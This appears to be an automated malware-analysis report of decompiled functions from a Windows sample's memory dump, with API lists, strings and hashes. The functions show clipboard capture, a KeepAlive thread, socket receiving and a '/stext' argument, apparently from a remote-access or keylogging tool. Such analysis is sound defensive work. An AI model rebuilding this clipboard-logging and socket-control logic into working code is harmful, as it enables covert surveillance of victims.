                                  • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                  • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406C35, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 31%
                                  			E00406C35(void* __ecx) {
				char _v5;
				char _v24;
				char _v40;
				char* _t13;
				void* _t18;
				void* _t34;

				_t18 = __ecx;
				if(( *0x41b8f8 & 0x00000001) == 0) {
					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00406CF4);
				}
				E00406BEF(_t18,  &_v24);
				_t13 =  &_v24;
				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
				if(_t13 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
					_t13 =  &_v24;
					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
					if(_t13 != 0) {
						L00414176();
						L00414170();
						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t13;
			}









                                  0x00406c45
                                  0x00406c4c
                                  0x00406c4e
                                  0x00406c5b
                                  0x00406c66
                                  0x00406c6b
                                  0x00406c72
                                  0x00406c7c
                                  0x00406c81
                                  0x00406c8b
                                  0x00406c93
                                  0x00406c99
                                  0x00406ca2
                                  0x00406cac
                                  0x00406cc4
                                  0x00406cce
                                  0x00406cd8
                                  0x00406ce0
                                  0x00406ce0
                                  0x00406cac
                                  0x00406ce9
                                  0x00406cf3

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                  Strings
                                  • [End of clipboard text], xrefs: 00406CB8
                                  • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                  • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                  • API String ID: 1191203583-3441917614
                                  • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                  • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402580, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66timethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
				struct _SYSTEMTIME _v20;
				char _v36;
				void* _v52;
				char* _t25;
				char* _t26;
				intOrPtr _t35;
				void* _t37;

				_t37 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t35 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x41bcac; // 0x0
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_t25 =  &_a11;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
						_t26 =  &_v36;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
						printf(_t26);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				} else {
					 *((char*)(__ecx + 0x44)) = 1;
				}
				 *((char*)(_t37 + 0x38)) = 1;
				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
				CreateThread(0, 0, E004027A2, _t37, 0, 0);
				return 1;
			}










                                  0x00402588
                                  0x0040258f
                                  0x0040262f
                                  0x00000000
                                  0x0040262f
                                  0x00402599
                                  0x0040259c
                                  0x004025a4
                                  0x004025aa
                                  0x004025b0
                                  0x004025ce
                                  0x004025dc
                                  0x004025e3
                                  0x004025e7
                                  0x004025f1
                                  0x004025f8
                                  0x00402604
                                  0x0040260d
                                  0x0040260d
                                  0x0040259e
                                  0x0040259e
                                  0x0040259e
                                  0x0040261d
                                  0x00402621
                                  0x00402624
                                  0x00000000

                                  APIs
                                  • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                  • printf.MSVCRT ref: 004025F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                  • CreateThread.KERNEL32(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                  Strings
                                  • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                  • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                  • API String ID: 3715082883-586133315
                                  • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                  • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411A24, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                  • String ID: alarm.wav
                                  • API String ID: 3304909635-4094641389
                                  • Opcode ID: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                  • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                  • Opcode Fuzzy Hash: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                  • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AD6F, Relevance: 16.6, APIs: 11, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040AD91
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                    • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                  • String ID:
                                  • API String ID: 1795822965-0
                                  • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                  • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402149, Relevance: 16.6, APIs: 11, Instructions: 75networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                  • malloc.MSVCRT ref: 00402175
                                  • recv.WS2_32(0041BE70,00000000,00000000,00000000), ref: 00402186
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                    • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                    • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                    • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                    • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6B015DF0), ref: 00402302
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                  • String ID:
                                  • API String ID: 2200674315-0
                                  • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                  • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004124BE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                  • time.MSVCRT ref: 004124E5
                                  • srand.MSVCRT ref: 004124F2
                                  • rand.MSVCRT ref: 00412506
                                  • rand.MSVCRT ref: 0041251A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  Strings
                                  • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                  • String ID: abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 3357298394-1277644989
